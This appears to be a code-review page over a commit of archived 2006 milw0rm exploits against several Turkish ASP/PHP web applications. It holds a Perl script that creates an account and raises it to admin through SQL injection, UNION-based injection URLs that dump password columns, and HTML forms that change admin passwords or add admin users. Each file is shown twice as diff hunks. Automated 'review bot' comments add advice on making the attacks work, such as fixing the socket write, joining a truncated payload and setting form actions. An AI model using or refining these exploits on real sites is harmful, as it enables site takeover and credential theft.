print $mn "Connection: Keep-Alive\r\n";
print $mn "Cache-Control: no-cache\r\n\r\n";
print $mn $mndata;
print $mn "\r\n\r\n";
while ($answer = <$mn>) {
if ($answer =~ /Tebrikler !!!/) {
print "- Creating user has been done...\r\n";
print "- Loginning in to user...\r\n";
dologin();
}
}
#if you are here...
die "- Exploit failed\r\n";
}
sub dologin ()
{
close ($mn);
$mnltar = "enter.asp";
$mnlreq = $mnhost.$mndir.$mnltar;
$mnldata = "kuladi=".$mnuser;
$mnldata.= "&password=".$mnpass;
$mnldata.= "&guvenlik=423412";
$mnldata.= "&gguvenlik=423412";
$mnldatalen = length($mnldata);
$mnl = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$mnserver", PeerPort => "$mnport") || die "- Connection failed...\r\n";
print $mnl "POST $mnlreq HTTP/1.1\r\n";
print $mnl "Accept: */*\r\n";
print $mnl "Referer: $mnhost\r\n";
print $mnl "Accept-Language: tr\r\n";
print $mnl "Content-Type: application/x-www-form-urlencoded\r\n";
print $mnl "Accept-Encoding: gzip, deflate\r\n";
print $mnl "User-Agent: NukeZilla\r\n";
print $mnl "Host: $mnserver\r\n";
print $mnl "Content-length: $mnldatalen\r\n";
print $mnl "Connection: Keep-Alive\r\n";
print $mnl "Cache-Control: no-cache\r\n\r\n";
print $mnl $mnldata;
print $mnl "\r\n\r\n";
while ($answer = <$mnl>) {
if ($answer =~ /Set-Cookie: (.*?) path=\//) { $mnlcookie = $mnlcookie.$1; }
if ($answer =~ /Cache-control:/) { doadmin(); }
}
#if you are here...
die "- Exploit failed\r\n";
}
sub doadmin ()
{
close($mnl);
print "- Editing profile..\r\n";
$mnptar = "Your_Account.asp?op=UpdateProfile";
$mnpreq = $mnhost.$mndir.$mnptar;
$mnpdata.= "email=".$mnmail;
$mnpdata.= "&isim=h4x0r";
$mnpdata.= "&g_soru=whooooo";
$mnpdata.= "&g_cevap=h4x0rs";
$mnpdata.= "&icq=1";
$mnpdata.= "&msn=1";
$mnpdata.= "&aim=1";
$mnpdata.= "&sehir=1";
$mnpdata.= "&meslek=1";
$mnpdata.= "&cinsiyet=b";
$mnpdata.= "&yas_1=1";
$mnpdata.= "&yas_2=1";
$mnpdata.= "&yas_3=1920',seviye='1";
$mnpdata.= "&web=http://www.milw0rm.com";
$mnpdata.= "&imza=h4x0r";
$mnpdata.= "&mavatar=IMAGES/avatars/1.gif";
$mnpdata.= "&mail_goster=on";
$mnpdatalen = length($mnpdata);
$mnp = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$mnserver", PeerPort => "$mnport") || die "- Connection failed...\r\n";
print $mnp "POST $mnpreq HTTP/1.1\r\n";
print $mnp "Accept: */*\r\n";
print $mnp "Referer: $mnhost\r\n";
print $mnp "Accept-Language: tr\r\n";
print $mnp "Content-Type: application/x-www-form-urlencoded\r\n";
print $mnp "Accept-Encoding: gzip, deflate\r\n";
print $mnp "User-Agent: NukeZilla\r\n";
print $mnp "Cookie: $mnlcookie\r\n";
print $mnp "Host: $mnserver\r\n";
print $mnp "Content-length: $mnpdatalen\r\n";
print $mnp "Connection: Keep-Alive\r\n";
print $mnp "Cache-Control: no-cache\r\n\r\n";
print $mnp $mnpdata;
print $mn "\r\n\r\n";
while ($answer = <$mnp>) {
if ($answer =~ /Tebrikler !!!/) {
print "- Editing profile been done...\r\n";
print "- Exploiting finished succesfully\r\n";
print "- Your username $mnuser has been created as admin\r\n";
print "- You can login with password $mnpass on $mnlreq\r\n";
exit();
}
if ($answer =~ /Üyeler Açýktýr/) {
print "- Exploit failed\r\n";
exit();
}
}
#if you are here...
die "- Exploit failed\r\n";
}
# nukedx.com [2006-05-27]
# milw0rm.com [2006-05-27]
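Review bot: in doadmin(), the `print $mn "\r\n\r\n";` that follows `print $mnp $mnpdata;` writes to `$mn`, the registration socket that dologin() already closed, instead of `$mnp`; make it `print $mnp "\r\n\r\n";` or drop it, since the Content-length header already covers the body. Two things the script does silently also deserve a comment: the escalation is carried entirely by `$mnpdata.= "&yas_3=1920',seviye='1";`, which closes the string in the UPDATE behind Your_Account.asp?op=UpdateProfile and sets seviye to 1 (the success message then reports the user "has been created as admin"), and the login POST sends a fixed `guvenlik=423412` together with `gguvenlik=423412` with no indication of where that value comes from. Minor: the success strings ("Loginning in", "Editing profile been done", "succesfully") read badly and could be cleaned up in the same change.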

View file

@ -1,25 +1,25 @@
Enigma Haber <= 4.3 Multiple Remote SQL Injection Vulnerabilities
Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com
This exploits works on Enigma Haber <= 4.3
Original advisory can be found at: http://www.nukedx.com/?viewdoc=34
http://[site]/enigmadir/e_mesaj_yaz.asp?id=1879586820+UNION+SELECT+0,sifre,2,3,4,5,6,7,8,9,10,110,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM+yonet+where+yonetid=1144931586
http://[site]/enigmadir/yazdir.asp?hid=SQL
http://[site]/enigmadir/yorum.asp?hid=SQL
http://[site]/enigmadir/edi_haber.asp?id=SQL&tur=1
http://[site]/enigmadir/ara.asp?yo=1&ara=SQL&ko=0&k=0&d=hid&e=desc&ay=00&yil=00
http://[site]/enigmadir/arsiv.asp?d=hid&e=desc+UNION+SELECT+0,sifre,isim,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+FROM+yonet+where+yonetid%20like%201144927664&ay=00&yil=00&e_kad=00
http://[site]/enigmadir/haber_devam.asp?id=SQL
Examples in the below needs admin rights.
http://[site]/enigmadir/admin/y_admin.asp?yid=SQL
http://[site]/enigmadir/admin/y_admin.asp?yid=34+UNION+SELECT+0,1,mail,3,4,5,sifre,isim,8,9,sehir+from+yonet+where+yonetid=1144927664
http://[site]/enigmadir/admin/reklam_detay.asp?bid=SQL
http://[site]/enigmadir/admin/detay_yorum.asp?hid=SQL
http://[site]/enigmadir/admin/haber_sil.asp?hid=SQL
http://[site]/enigmadir/admin/kategori_d.asp?o=1&kid=SQL
http://[site]/enigmadir/admin/haber_ekle.asp?tur=SQL
http://[site]/enigmadir/admin/e_mesaj_yaz.asp?s=SQL
http://[site]/enigmadir/admin/admin_sil.asp?id=SQL
# nukedx.com [2006-05-27]
# milw0rm.com [2006-05-28]
Enigma Haber <= 4.3 Multiple Remote SQL Injection Vulnerabilities
Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com
This exploits works on Enigma Haber <= 4.3
Original advisory can be found at: http://www.nukedx.com/?viewdoc=34
http://[site]/enigmadir/e_mesaj_yaz.asp?id=1879586820+UNION+SELECT+0,sifre,2,3,4,5,6,7,8,9,10,110,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM+yonet+where+yonetid=1144931586
http://[site]/enigmadir/yazdir.asp?hid=SQL
http://[site]/enigmadir/yorum.asp?hid=SQL
http://[site]/enigmadir/edi_haber.asp?id=SQL&tur=1
http://[site]/enigmadir/ara.asp?yo=1&ara=SQL&ko=0&k=0&d=hid&e=desc&ay=00&yil=00
http://[site]/enigmadir/arsiv.asp?d=hid&e=desc+UNION+SELECT+0,sifre,isim,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+FROM+yonet+where+yonetid%20like%201144927664&ay=00&yil=00&e_kad=00
http://[site]/enigmadir/haber_devam.asp?id=SQL
Examples in the below needs admin rights.
http://[site]/enigmadir/admin/y_admin.asp?yid=SQL
http://[site]/enigmadir/admin/y_admin.asp?yid=34+UNION+SELECT+0,1,mail,3,4,5,sifre,isim,8,9,sehir+from+yonet+where+yonetid=1144927664
http://[site]/enigmadir/admin/reklam_detay.asp?bid=SQL
http://[site]/enigmadir/admin/detay_yorum.asp?hid=SQL
http://[site]/enigmadir/admin/haber_sil.asp?hid=SQL
http://[site]/enigmadir/admin/kategori_d.asp?o=1&kid=SQL
http://[site]/enigmadir/admin/haber_ekle.asp?tur=SQL
http://[site]/enigmadir/admin/e_mesaj_yaz.asp?s=SQL
http://[site]/enigmadir/admin/admin_sil.asp?id=SQL
# nukedx.com [2006-05-27]
# milw0rm.com [2006-05-28]
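Review bot: the line "Examples in the below needs admin rights." splits the list into pre-authentication injections (e_mesaj_yaz.asp, yazdir.asp, yorum.asp, edi_haber.asp, ara.asp, arsiv.asp, haber_devam.asp) and post-authentication ones under admin/, but the header only says "Multiple Remote SQL Injection Vulnerabilities"; state in the header that the admin/ entries require an authenticated admin session, since that changes the severity of half the list. The two worked UNION payloads (e_mesaj_yaz.asp with 26 columns, arsiv.asp with 20) pull `sifre` from `yonet`, which is the useful part of the page and could be called out as the pre-auth credential leak.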

View file

@ -1,15 +1,15 @@
ASPSitem <= 2.0 Multiple Vulnerabilities.
Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com
This exploits works on ASPSitem <= 2.0.
Original advisory can be found at: http://www.nukedx.com/?viewdoc=39
SQL injection ->
GET -> http://[victim]/[ASPSitemDir]/Anket.asp?hid=[SQL]
EXAMPLE -> http://[victim]/[ASPSitemDir]/Anket.asp?hid=4%20union%20select%20sifre,0%20from%20uyeler%20where%20
id%20like%201
with this example remote attacker can leak userid 1's login information from database.
Read others private messages ->
GET/EXAMPLE -> http://[victim]/[ASPSitemDir]/Hesabim.asp?mesaj=oku&id=1&uye=yourusername
# nukedx.com [2006-05-27]
# milw0rm.com [2006-05-28]
ASPSitem <= 2.0 Multiple Vulnerabilities.
Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com
This exploits works on ASPSitem <= 2.0.
Original advisory can be found at: http://www.nukedx.com/?viewdoc=39
SQL injection ->
GET -> http://[victim]/[ASPSitemDir]/Anket.asp?hid=[SQL]
EXAMPLE -> http://[victim]/[ASPSitemDir]/Anket.asp?hid=4%20union%20select%20sifre,0%20from%20uyeler%20where%20
id%20like%201
with this example remote attacker can leak userid 1's login information from database.
Read others private messages ->
GET/EXAMPLE -> http://[victim]/[ASPSitemDir]/Hesabim.asp?mesaj=oku&id=1&uye=yourusername
# nukedx.com [2006-05-27]
# milw0rm.com [2006-05-28]
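Review bot: the EXAMPLE URL for Anket.asp is wrapped onto two lines on both sides of the hunk, ending at `...from%20uyeler%20where%20` with `id%20like%201` on the next line, so anyone copying it gets a payload truncated at `where`; join it into a single line as the Hesabim.asp example already is. The sentence that follows ("with this example remote attacker can leak userid 1's login information") depends on that join.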

View file

@ -1,69 +1,69 @@
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META http-equiv="Content-Type" content="text/html; charset=utf-8"></head><body>
<div bgcolor="#000000">
<form name="InputForm" method="post" target="_blank" onsubmit="return window.confirm(&quot;You are submitting information to an external page.\nAre you sure?&quot;);">
<b><font color="#808080" face="Verdana">Speedy Forum User Pass Change //
ajann</font></b><p><font face="Verdana" size="2" color="#FF0000"><b>User
Name
: </b></font>
<input type="text" name="name" value="" size="20">
<font size="1" color="#C0C0C0" face="Arial"> Example: Surname
Name</font><br>
<font face="Verdana" size="2" color="#FF0000"><b>User
Mail
: </b></font>
<input type="text" name="email" value="" size="20">
<font size="1" color="#C0C0C0" face="Arial"> Example:
<a href="mailto:mail@domain.com" target="_blank">mail@domain.com</a></font><br>
<font face="Verdana" size="2" color="#FF0000"><b>User
Ýd
: </b></font>
<input type="text" name="id" value="" size="20">
<font size="1" color="#C0C0C0" face="Arial"> Example: Ýd:1
Admin</font><br>
<font face="Verdana" size="2" color="#FF0000"><b>User Country :
</b>
</font>
<select size="1" name="country">
<option value="0">Choose Country</option>
<option value="Turkey">Turkey</option>
</select> <font size="1" color="#C0C0C0" face="Arial"> Example:
Turkey</font><br>
<b>
<font face="Verdana" size="2" color="#FF0000">User </font>
<font face="Verdana" size="2" color="#0000FF">Pass </font>
<font face="Verdana" size="2" color="#FF0000">
: </font></b>
<input type="text" name="password" value="Password" size="20">
<font size="1" color="#C0C0C0" face="Arial"> Example: 123456</font><br>
<b>
<font face="Verdana" size="2" color="#FF0000">User </font>
<font face="Verdana" size="2" color="#0000FF">RePass</font><font face="Verdana" size="2" color="#FF0000">
: </font></b>
<input type="text" name="passwordre" value="Re Password" size="20">
<font size="1" color="#C0C0C0" face="Arial"> Example: 123456</font><br>
<font face="Verdana" size="2" color="#FF0000"><b>Form Action :
</b>
</font>
<input type="text" name="adres" value="profileupdate.asp" size="20">
<font size="1" color="#C0C0C0" face="Arial"> Example:
http://[target]/[path]/profileu<WBR>pdate.asp</font></p>
<p>
<input type="submit" name="Submit" value="Change"> </p>
<br>
</form>
</div></body></html>
# milw0rm.com [2006-05-29]
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META http-equiv="Content-Type" content="text/html; charset=utf-8"></head><body>
<div bgcolor="#000000">
<form name="InputForm" method="post" target="_blank" onsubmit="return window.confirm(&quot;You are submitting information to an external page.\nAre you sure?&quot;);">
<b><font color="#808080" face="Verdana">Speedy Forum User Pass Change //
ajann</font></b><p><font face="Verdana" size="2" color="#FF0000"><b>User
Name
: </b></font>
<input type="text" name="name" value="" size="20">
<font size="1" color="#C0C0C0" face="Arial"> Example: Surname
Name</font><br>
<font face="Verdana" size="2" color="#FF0000"><b>User
Mail
: </b></font>
<input type="text" name="email" value="" size="20">
<font size="1" color="#C0C0C0" face="Arial"> Example:
<a href="mailto:mail@domain.com" target="_blank">mail@domain.com</a></font><br>
<font face="Verdana" size="2" color="#FF0000"><b>User
Ýd
: </b></font>
<input type="text" name="id" value="" size="20">
<font size="1" color="#C0C0C0" face="Arial"> Example: Ýd:1
Admin</font><br>
<font face="Verdana" size="2" color="#FF0000"><b>User Country :
</b>
</font>
<select size="1" name="country">
<option value="0">Choose Country</option>
<option value="Turkey">Turkey</option>
</select> <font size="1" color="#C0C0C0" face="Arial"> Example:
Turkey</font><br>
<b>
<font face="Verdana" size="2" color="#FF0000">User </font>
<font face="Verdana" size="2" color="#0000FF">Pass </font>
<font face="Verdana" size="2" color="#FF0000">
: </font></b>
<input type="text" name="password" value="Password" size="20">
<font size="1" color="#C0C0C0" face="Arial"> Example: 123456</font><br>
<b>
<font face="Verdana" size="2" color="#FF0000">User </font>
<font face="Verdana" size="2" color="#0000FF">RePass</font><font face="Verdana" size="2" color="#FF0000">
: </font></b>
<input type="text" name="passwordre" value="Re Password" size="20">
<font size="1" color="#C0C0C0" face="Arial"> Example: 123456</font><br>
<font face="Verdana" size="2" color="#FF0000"><b>Form Action :
</b>
</font>
<input type="text" name="adres" value="profileupdate.asp" size="20">
<font size="1" color="#C0C0C0" face="Arial"> Example:
http://[target]/[path]/profileu<WBR>pdate.asp</font></p>
<p>
<input type="submit" name="Submit" value="Change"> </p>
<br>
</form>
</div></body></html>
# milw0rm.com [2006-05-29]
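Review bot: the `<form name="InputForm" method="post" target="_blank" ...>` has no `action` attribute, so submitting it posts to whatever page is hosting this HTML; the `adres` text field labelled "Form Action" is sent as just another parameter and does not redirect the request anywhere. Either add `action="http://[target]/[path]/profileupdate.asp"` to the form and tell the user to edit it, or remove the misleading `adres` field. While touching the file, the `Ýd` labels are cp1254 text rendered as cp1252 (the dotted Turkish İ) and the `<WBR>` inside `profileu<WBR>pdate.asp` in the example text will break copy and paste.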

View file

@ -1,43 +1,43 @@
################ KAPDA - Security Science Researchers Institute #################
#Advisory : http://www.kapda.ir/advisory-337.html
#Vendor : http://www.nukedit.com/
#What is : Nukedit is a Free Content Management
#Vulnerability : Unauthorized Admin Add Exploit if "register.asp" be enable!
#Discovered : 3nitro - farhadkey {AT} kapda [d0t] ir
#Vulnerabale versions : <= 4.9.6
#Grtz to : Irannetjob.com, Maskofgod.net, Hamid.ir, ihsteam.com, simorhg-ev.com, hat-squad.com
#Solution : update to new version of nukedit .
#Change "http://victim.com/nukedit/utilities/register.asp"
################ KAPDA - Security Science Researchers Institute #################
<html><head><title>Kapda HTML PoC For Nukedit <= 4.9.6</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252"></head>
<body>
<font face="Verdana" Size="1"><br>
Kapda HTML PoC For Nukedit <= 4.9.6 (With Security Patch) Unauthorized Admin Add Exploit<br>
Discovered and coded by 3nitro - farhadkey {AT} kapda [dot] ir <br>
Change the form's action in source : "http://victim.com/nukedit/utilities/register.asp"<br>
Fill the blank and submit . After that login with your email ! + your password .<p>
<form name="frmUser" method="post" action="http://victim.com/nukedit/utilities/register.asp">
<input type="hidden" name="action" value="addDB"></p>
<br><br><br>Username :<input type="text" name="username" size="50" style="float: left; font-family: Verdana; font-size: 7pt">
<input type="hidden" name="company" size="30" value="MSN">
<input type="hidden" name="Url" size="30" value="http://www.lol.ir">
<input type="hidden" name="address" size="30" value="System32">
<input type="hidden" name="county" size="30" value="00">
<input type="hidden" name="zip" size="10" value="12345">
<input type="hidden" name="country" value="XPL">
<input type="hidden" name="phone" size="15" value="12345678">
<input type="hidden" name="fax" size="15" value="87654321">
<br><br><br>Your E-mail : <input type="text" name="email" size="30" style="float: left; font-family: Verdana; font-size: 7pt">
<br><br><br>Your Password : <input type="password" name="password" size="20" style="float: left; font-family: Verdana; font-size: 7pt">
<input type= "hidden" name="groupid" value="1">
<input type="hidden" name="IP" value="10.9.8.7">
<br><br><br><input type="submit" value="Create Account" id="submit1" name="submit1"><br>
<!-- Nukedit Exploit Discovered and coded by 3nitro (farhadkey {AT} kapda [D0T] ir) -->
</font>
</form>
</body>
</html>
# milw0rm.com [2006-05-29]
################ KAPDA - Security Science Researchers Institute #################
#Advisory : http://www.kapda.ir/advisory-337.html
#Vendor : http://www.nukedit.com/
#What is : Nukedit is a Free Content Management
#Vulnerability : Unauthorized Admin Add Exploit if "register.asp" be enable!
#Discovered : 3nitro - farhadkey {AT} kapda [d0t] ir
#Vulnerabale versions : <= 4.9.6
#Grtz to : Irannetjob.com, Maskofgod.net, Hamid.ir, ihsteam.com, simorhg-ev.com, hat-squad.com
#Solution : update to new version of nukedit .
#Change "http://victim.com/nukedit/utilities/register.asp"
################ KAPDA - Security Science Researchers Institute #################
<html><head><title>Kapda HTML PoC For Nukedit <= 4.9.6</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252"></head>
<body>
<font face="Verdana" Size="1"><br>
Kapda HTML PoC For Nukedit <= 4.9.6 (With Security Patch) Unauthorized Admin Add Exploit<br>
Discovered and coded by 3nitro - farhadkey {AT} kapda [dot] ir <br>
Change the form's action in source : "http://victim.com/nukedit/utilities/register.asp"<br>
Fill the blank and submit . After that login with your email ! + your password .<p>
<form name="frmUser" method="post" action="http://victim.com/nukedit/utilities/register.asp">
<input type="hidden" name="action" value="addDB"></p>
<br><br><br>Username :<input type="text" name="username" size="50" style="float: left; font-family: Verdana; font-size: 7pt">
<input type="hidden" name="company" size="30" value="MSN">
<input type="hidden" name="Url" size="30" value="http://www.lol.ir">
<input type="hidden" name="address" size="30" value="System32">
<input type="hidden" name="county" size="30" value="00">
<input type="hidden" name="zip" size="10" value="12345">
<input type="hidden" name="country" value="XPL">
<input type="hidden" name="phone" size="15" value="12345678">
<input type="hidden" name="fax" size="15" value="87654321">
<br><br><br>Your E-mail : <input type="text" name="email" size="30" style="float: left; font-family: Verdana; font-size: 7pt">
<br><br><br>Your Password : <input type="password" name="password" size="20" style="float: left; font-family: Verdana; font-size: 7pt">
<input type= "hidden" name="groupid" value="1">
<input type="hidden" name="IP" value="10.9.8.7">
<br><br><br><input type="submit" value="Create Account" id="submit1" name="submit1"><br>
<!-- Nukedit Exploit Discovered and coded by 3nitro (farhadkey {AT} kapda [D0T] ir) -->
</font>
</form>
</body>
</html>
# milw0rm.com [2006-05-29]
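Review bot: nothing in the header or the page text says which field makes the new account an admin; the hidden `<input type= "hidden" name="groupid" value="1">` is the only privilege-bearing field in the form, so the advisory should state plainly that register.asp trusts a client-supplied groupid. The hidden `IP` field set to 10.9.8.7 is likewise attacker-controlled and worth a comment. Header typo: `#Vulnerabale versions` should be `#Vulnerable versions`, and the solution line would be more useful with the fixed version number than "update to new version of nukedit".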

View file

@ -1,79 +1,79 @@
<!--
# Title : aspWebLinks 2.0 Remote Admin Pass Change Exploit and links.asp SQL Injection
# Author : ajann
# Dork : aspWebLinks 2.0
SQL INJECTION:
http://[target]/[path]/links.asp?action=reporterror&linkID=221%20union%20select+0,administrativepassword,0,0,0,0,0,0,0+from+config
-->
<title>AspWebLink 2.0 Remote Admin Pass Change Exploit</title>
<form method='POST' action='links.asp?action=modifyconfigprocess'><input
type='hidden' name='txtConfigID' value='1'><input type='hidden'
name='txtSkinName' value='default'><table border='0' width='100%'
cellspacing='0' cellpadding='3'><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1" color="black"><b>Administrative
Password:</b></font></td><td width='70%'><input type='text'
name='txtAdministrativePassword' size='43'
value='EDITPASSWORD'></td></tr><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1" color="black"><b>Number of Days
New:</b></font></td><td width='70%'><input type='text'
name='txtNumberOfDaysNew' size='43' value='15'></td></tr><tr><td width='30%'
align='right' valign='top'><font face="Tahoma" size="1"
color="black"><b>Number of Visits Hot:</b></font></td><td width='70%'><input
type='text' name='txtHotRating' size='43' value='200'></td></tr><tr><td
width='30%' align='right' valign='top'><font face="Tahoma" size="1"
color="black"><b>Links Per Page:</b></font></td><td width='70%'><input
type='text' name='txtRecordsPerPage' size='43' value='12'></td></tr><tr><td
width='30%' align='right' valign='top'><font face="Tahoma" size="1"
color="black"><b>Category Header:</b></font></td><td width='70%'><input
type='text' name='txtCategoryHeader' size='43' value='<b>Select A
Category:</b>'></td></tr><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1" color="black"><b>Category
Columns:</b></font></td><td width='70%'><input type='text'
name='txtCategoryCols' size='43' value='2'></td></tr><tr><td width='30%'
align='right' valign='top'><font face="Tahoma" size="1" color="black"><b>Sub
Category Header:</b></font></td><td width='70%'><input type='text'
name='txtSubCategoryHeader' size='43' value='Select A Sub Category to pick
or ADD your link:'></td></tr><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1" color="black"><b>Show Category
Description:</b></font></td><td width='70%'><input type='radio' value='YES'
name='txtShowCatDescription' checked >YES<input type='radio' value='NO'
name='txtShowCatDescription' >NO</td></tr><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1" color="black"><b>Show Whats New on
home page:</b></font></td><td width='70%'><input type='radio' value='YES'
name='txtShowWhatsNew' checked >YES<input type='radio' value='NO'
name='txtShowWhatsNew' >NO</td></tr><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1" color="black"><b>Number of New
items on home page:</b></font></td><td width='70%'><input type='text'
name='txtHowManyNew' size='43' value='10'></td></tr><tr><td width='30%'
align='right' valign='top'><font face="Tahoma" size="1"
color="black"><b>Show Whats Hot on home page:</b></font></td><td
width='70%'><input type='radio' value='YES' name='txtShowWhatsHot' checked
>YES<input type='radio' value='NO' name='txtShowWhatsHot'
>NO</td></tr><tr><td width='30%' align='right' valign='top'><font
face="Tahoma" size="1" color="black"><b>Require approval for link and review
additions:</b></font></td><td width='70%'><input type='radio' value='YES'
name='txtNeedApproval' checked >YES<input type='radio' value='NO'
name='txtNeedApproval' >NO</td></tr><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1" color="black"><b>Number of Hot
items on home page:</b></font></td><td width='70%'><input type='text'
name='txtHowManyHot' size='43' value='10'></td></tr><tr><td width='30%'
align='right' valign='top'><font face="Tahoma" size="1"
color="black"><b>Whats New Header:</b></font></td><td width='70%'><input
type='text' name='txtWhatsNewHeader' size='43' value='<b>Whats
New:</b>'></td></tr><tr><td width='30%' align='right' valign='top'><font
face="Tahoma" size="1" color="black"><b>Whats Hot Header:</b></font></td><td
width='70%'><input type='text' name='txtWhatsHotHeader' size='43'
value='<b>Whats Hot:</b>'></td></tr><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1" color="black"><b>Sort Links
By:</b></font></td><td width='70%'><select size='1' name='txtSortBy'><option
selected value='ALPHA'>Alphabetically</option><option value='DATE'>Date
Added</option><option value='HITS'>Number of
Visits</option></td></tr><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1"
color="black"><b></b></font></td><td width='70%'><input type='submit'
value='Update Configuration' name='B1'></td></tr></table></form>
# milw0rm.com [2006-06-01]
<!--
# Title : aspWebLinks 2.0 Remote Admin Pass Change Exploit and links.asp SQL Injection
# Author : ajann
# Dork : aspWebLinks 2.0
SQL INJECTION:
http://[target]/[path]/links.asp?action=reporterror&linkID=221%20union%20select+0,administrativepassword,0,0,0,0,0,0,0+from+config
-->
<title>AspWebLink 2.0 Remote Admin Pass Change Exploit</title>
<form method='POST' action='links.asp?action=modifyconfigprocess'><input
type='hidden' name='txtConfigID' value='1'><input type='hidden'
name='txtSkinName' value='default'><table border='0' width='100%'
cellspacing='0' cellpadding='3'><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1" color="black"><b>Administrative
Password:</b></font></td><td width='70%'><input type='text'
name='txtAdministrativePassword' size='43'
value='EDITPASSWORD'></td></tr><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1" color="black"><b>Number of Days
New:</b></font></td><td width='70%'><input type='text'
name='txtNumberOfDaysNew' size='43' value='15'></td></tr><tr><td width='30%'
align='right' valign='top'><font face="Tahoma" size="1"
color="black"><b>Number of Visits Hot:</b></font></td><td width='70%'><input
type='text' name='txtHotRating' size='43' value='200'></td></tr><tr><td
width='30%' align='right' valign='top'><font face="Tahoma" size="1"
color="black"><b>Links Per Page:</b></font></td><td width='70%'><input
type='text' name='txtRecordsPerPage' size='43' value='12'></td></tr><tr><td
width='30%' align='right' valign='top'><font face="Tahoma" size="1"
color="black"><b>Category Header:</b></font></td><td width='70%'><input
type='text' name='txtCategoryHeader' size='43' value='<b>Select A
Category:</b>'></td></tr><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1" color="black"><b>Category
Columns:</b></font></td><td width='70%'><input type='text'
name='txtCategoryCols' size='43' value='2'></td></tr><tr><td width='30%'
align='right' valign='top'><font face="Tahoma" size="1" color="black"><b>Sub
Category Header:</b></font></td><td width='70%'><input type='text'
name='txtSubCategoryHeader' size='43' value='Select A Sub Category to pick
or ADD your link:'></td></tr><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1" color="black"><b>Show Category
Description:</b></font></td><td width='70%'><input type='radio' value='YES'
name='txtShowCatDescription' checked >YES<input type='radio' value='NO'
name='txtShowCatDescription' >NO</td></tr><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1" color="black"><b>Show Whats New on
home page:</b></font></td><td width='70%'><input type='radio' value='YES'
name='txtShowWhatsNew' checked >YES<input type='radio' value='NO'
name='txtShowWhatsNew' >NO</td></tr><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1" color="black"><b>Number of New
items on home page:</b></font></td><td width='70%'><input type='text'
name='txtHowManyNew' size='43' value='10'></td></tr><tr><td width='30%'
align='right' valign='top'><font face="Tahoma" size="1"
color="black"><b>Show Whats Hot on home page:</b></font></td><td
width='70%'><input type='radio' value='YES' name='txtShowWhatsHot' checked
>YES<input type='radio' value='NO' name='txtShowWhatsHot'
>NO</td></tr><tr><td width='30%' align='right' valign='top'><font
face="Tahoma" size="1" color="black"><b>Require approval for link and review
additions:</b></font></td><td width='70%'><input type='radio' value='YES'
name='txtNeedApproval' checked >YES<input type='radio' value='NO'
name='txtNeedApproval' >NO</td></tr><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1" color="black"><b>Number of Hot
items on home page:</b></font></td><td width='70%'><input type='text'
name='txtHowManyHot' size='43' value='10'></td></tr><tr><td width='30%'
align='right' valign='top'><font face="Tahoma" size="1"
color="black"><b>Whats New Header:</b></font></td><td width='70%'><input
type='text' name='txtWhatsNewHeader' size='43' value='<b>Whats
New:</b>'></td></tr><tr><td width='30%' align='right' valign='top'><font
face="Tahoma" size="1" color="black"><b>Whats Hot Header:</b></font></td><td
width='70%'><input type='text' name='txtWhatsHotHeader' size='43'
value='<b>Whats Hot:</b>'></td></tr><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1" color="black"><b>Sort Links
By:</b></font></td><td width='70%'><select size='1' name='txtSortBy'><option
selected value='ALPHA'>Alphabetically</option><option value='DATE'>Date
Added</option><option value='HITS'>Number of
Visits</option></td></tr><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1"
color="black"><b></b></font></td><td width='70%'><input type='submit'
value='Update Configuration' name='B1'></td></tr></table></form>
# milw0rm.com [2006-06-01]
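Review bot: the form action is the relative `links.asp?action=modifyconfigprocess`, so this HTML only works if it is served from the target's own directory; unlike the other PoCs in this commit, the header comment never tells the user to rewrite it as `http://[target]/[path]/links.asp?action=modifyconfigprocess`, nor that `value='EDITPASSWORD'` in `txtAdministrativePassword` is the field to change. Add both instructions to the comment block. The unauthenticated config update is the real finding here and deserves a sentence; the SQL injection line only shows how to read `administrativepassword` from `config`. Also the title says `AspWebLink 2.0` while the header says `aspWebLinks 2.0`.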

View file

@ -1,8 +1,8 @@
# ProPublish 2.0 (catid) Remote SQL Injection Vulnerability
# Thanks to soot : http://www.securityfocus.com/archive/1/435787/30/0/threaded
# Exploited by FarhadKey from kapda.ir
Exploit :
http://[site]/[propublish]/cat.php?catid=-1%20union%20select%201,1,email,1,1,null,1,password,9%20from%20author_news%20/*&catname=CTE
# milw0rm.com [2006-06-03]
# ProPublish 2.0 (catid) Remote SQL Injection Vulnerability
# Thanks to soot : http://www.securityfocus.com/archive/1/435787/30/0/threaded
# Exploited by FarhadKey from kapda.ir
Exploit :
http://[site]/[propublish]/cat.php?catid=-1%20union%20select%201,1,email,1,1,null,1,password,9%20from%20author_news%20/*&catname=CTE
# milw0rm.com [2006-06-03]

View file

@ -1,12 +1,12 @@
